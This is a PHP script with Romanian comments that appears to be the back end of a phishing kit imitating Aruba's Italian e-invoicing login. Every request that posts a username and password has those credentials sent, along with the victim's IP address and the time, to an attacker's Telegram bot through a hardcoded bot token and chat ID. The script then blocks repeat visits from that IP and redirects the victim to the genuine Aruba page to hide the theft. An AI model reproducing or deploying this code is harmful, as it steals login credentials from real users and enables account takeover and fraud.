<?php
session_start();

// Obține adresa IP a utilizatorului
$ip_address = $_SERVER['REMOTE_ADDR'];

// Numele fișierului pentru stocarea IP-urilor
$ip_log_file = 'ip_block_list.txt';

// Configurare date pentru Telegram
$botToken = "7926532790:AAEy9y_XslyRd0dgaKb672TZyuzDZv3ykco"; // Token-ul botului
$chatId = "7196867329"; // ID-ul chatului unde primești mesajele

// Funcție pentru verificarea existenței IP-ului în lista de blocare
function is_ip_blocked($file, $ip) {
    if (!file_exists($file)) {
        return false;
    }
    $content = file($file, FILE_IGNORE_NEW_LINES);
    return in_array($ip, $content);
}

// Funcție pentru adăugarea unui IP în lista de blocare
function block_ip($file, $ip) {
    file_put_contents($file, $ip . PHP_EOL, FILE_APPEND | LOCK_EX);
}

// Funcție pentru trimiterea datelor către Telegram
function sendToTelegram($username, $password, $ip) {
    global $botToken, $chatId;

    // Construim mesajul pentru Telegram
    $message = "🔔 *User Aruba:*\n\n";
    $message .= "👤 *Username*: `$username`\n";
    $message .= "🔑 *Password*: `$password`\n";
    $message .= "🌐 *IP*: `$ip`\n";
    $message .= "🕒 *Data și ora*: `" . date('Y-m-d H:i:s') . "` (Europe/Berlin)";

    // Trimiterea mesajului folosind cURL
    $url = "https://api.telegram.org/bot$botToken/sendMessage";
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
        'chat_id' => $chatId,
        'text' => $message,
        'parse_mode' => 'Markdown'
    ]));
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

    $response = curl_exec($ch);
    if (curl_errno($ch)) {
        error_log("Eroare la trimiterea mesajului către Telegram: " . curl_error($ch));
    }
    curl_close($ch);
}

// Dacă IP-ul este deja blocat, redirecționează către URL-ul dorit
if (is_ip_blocked($ip_log_file, $ip_address)) {
    header("Location: https://fatturazioneelettronica.aruba.it/#login");
    exit();
}

// Dacă metoda este POST, trimite datele către Telegram și blochează IP-ul
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $username = isset($_POST['username']) ? htmlspecialchars($_POST['username']) : '';
    $password = isset($_POST['password']) ? htmlspecialchars($_POST['password']) : '';

    // Trimiterea datelor către Telegram
    sendToTelegram($username, $password, $ip_address);

    // Blochează IP-ul utilizatorului pentru accesări ulterioare
    block_ip($ip_log_file, $ip_address);

    // Redirecționează utilizatorul către URL-ul specificat
    header("Location: https://fatturazioneelettronica.aruba.it/#login");
    exit();
}

// Dacă cineva accesează direct `save_data.php` fără POST, redirecționează
header("Location: https://fatturazioneelettronica.aruba.it/#login");
exit();
?>
